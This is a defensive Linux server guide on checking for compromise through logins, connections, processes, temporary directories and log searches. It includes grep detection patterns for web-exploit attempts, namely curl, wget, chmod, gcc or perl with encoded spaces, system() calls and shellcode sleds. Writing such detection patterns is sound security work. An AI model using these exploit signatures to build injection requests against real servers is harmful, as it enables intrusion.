Check if the server is hacked or not
Introduction
Server security is critical for maintaining the integrity, confidentiality, and availability of your data and services. If you suspect unusual activity on your Linux server, it is important to investigate immediately to determine whether the system has been compromised. By checking user activity, running processes, network connections, and suspicious files, administrators can identify possible signs of intrusion or malicious activity.
Prerequisites
Before starting the investigation, ensure the following:
Root or sudo access to the Linux server
Basic knowledge of Linux commands and server administration
Access to server log files
Backup of important data before making any modifications
Avoid deleting or modifying suspicious files during the initial investigation phase
How to Check if the Server is Hacked or Not
1. Check Who Is Currently Logged Into the Server
Use the following commands to identify active users and SSH connections:
w
netstat -nalp | grep ":22"
OR
w && netstat -nalp | grep ":22"
These commands display currently logged-in users and active SSH sessions.
2. Check Who Logged Into the Server Previously
last
cat /var/log/secure* | grep ssh | grep Accept
cat /var/log/secure* | grep ftp | grep Accept
These logs help identify successful SSH and FTP login attempts.
3. Check Current Network Activity
netstat -nalp
nmap localhost
OR
netstat -nalp && nmap localhost
These commands help identify listening ports, suspicious services, and unusual network activity.
4. Check Running Processes
ps -elf
ls /proc/*/exe -la
Review running processes carefully for unknown or suspicious programs.
5. Check Common Attack Locations
ls /tmp -la
ls /var/tmp -la
ls /dev/shm -la
These directories are commonly used by attackers to store malicious scripts or binaries.
Important:
Do not delete or modify files immediately. First catalog and document suspicious files for further investigation.
6. Check Linux Version Information
For Red Hat-based systems:
cat /etc/redhat-release
For non-Red Hat systems:
cat /etc/issue
Compare the output with:
uname -a
and
cat /proc/version
This helps verify whether the kernel version matches the installed operating system version.
7. Check File Ownership and Access Information
Check the author or owner of files:
ls -la --author
Check file access times:
ls -l --time=access
This helps identify recently accessed or modified files.
8. Identify File Type
Before opening suspicious files, verify whether they are text or binary files:
file filename
OR
file /path/to/directory/*
9. Update the Locate Database
updatedb &
This updates the locate database for faster file searches.
10. Search for Apache Exploits
Search Apache access logs for common exploit patterns:
for i in `locate access_log`; do echo $i; egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' $i; done
OR
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /path/to/log/files/*
cPanel Servers
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/*/statistics/logs/*
Ensim Servers
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/virtual/site*/fst/var/log/httpd/*
Plesk Servers
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/httpd/vhosts/*/statistics/logs/*
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /var/log/httpd/*
11. Search for Shell Code Patterns
cat /path/to/access/logs/* | grep "/x90/"
This command searches for possible shellcode patterns in access logs.
Conclusion
By following the above investigation steps, administrators can identify suspicious activity and determine whether a Linux server has been compromised. Regular monitoring of login activity, processes, network connections, and log files plays a major role in early threat detection and server protection. If signs of compromise are found, it is recommended to isolate the server, perform a detailed forensic analysis, and strengthen security measures immediately.
